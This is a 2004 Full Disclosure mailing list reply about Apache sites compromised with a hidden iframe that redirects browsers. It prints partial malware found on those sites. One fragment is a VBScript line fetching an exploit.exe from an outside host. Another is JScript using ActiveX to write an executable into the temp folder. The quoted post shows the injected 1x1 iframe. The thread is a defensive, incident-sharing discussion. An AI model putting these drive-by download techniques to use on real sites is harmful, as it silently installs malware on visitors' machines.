Full Disclosure mailing list archives
Re: browser hijack by apache sites
From: D B <geggam692000 () yahoo com>
Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)
using konqueror i got it to download these two files Filename 1: 2DimensionOfExploitsEnc.php <html> <script language=vbs> szURL = "http://www.pizdato.biz/acc1/exploit.exe" </script> <script language="VBScript.Encode"> Filename 2: object2.cfm <script language=jscript> self.moveTo(5000,5000); self.close(); fs=new ActiveXObject("Scripting.FileSystemObject"); fname=fs.GetSpecialFolder(2)+'\\q381275.exe'; a=fs.CreateTextFile(fname,true); a.Write('MZ'); a.Close(); a=fs.OpenTextFile(fname,8,false,true);
Message: 1 From: Filbert <filbert () pandora be> Reply-To: filbert () pandora be To: full-disclosure () lists netsys com Date: Sun, 23 May 2004 15:19:30 +0200 Organization: Hell Subject: [Full-disclosure] browser hijack by apache sites
Hi,
This is the second time this weekend that I've been warned of an apache site on a Linux server were a line of code was added to redirect browsers to porn sites. First was the site of a Belgian political party. Second came today, and as of writing this it's still there. The admin was informed so it can be gone soon.
hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http IE users do NOT click.
the code added at the bottom is:
<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body>
anyone seen this before? What vulnerability is exploited here? FP?
Thx, Filb.
__________________________________ Do you Yahoo!? Yahoo! Domains Claim yours for only $14.70/year http://smallbusiness.promotions.yahoo.com/offer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- browser hijack by apache sites Filbert (May 23)
- <Possible follow-ups>
- Re: browser hijack by apache sites D B (May 23)
- Re:browser hijack by apache sites Ian Latter (May 23)
- browser hijack by apache sites Feher Tamas (May 24)
- Re: browser hijack by apache sites Filbert (May 24)
- Re: browser hijack by apache sites Matthijs Dalhuijsen (May 25)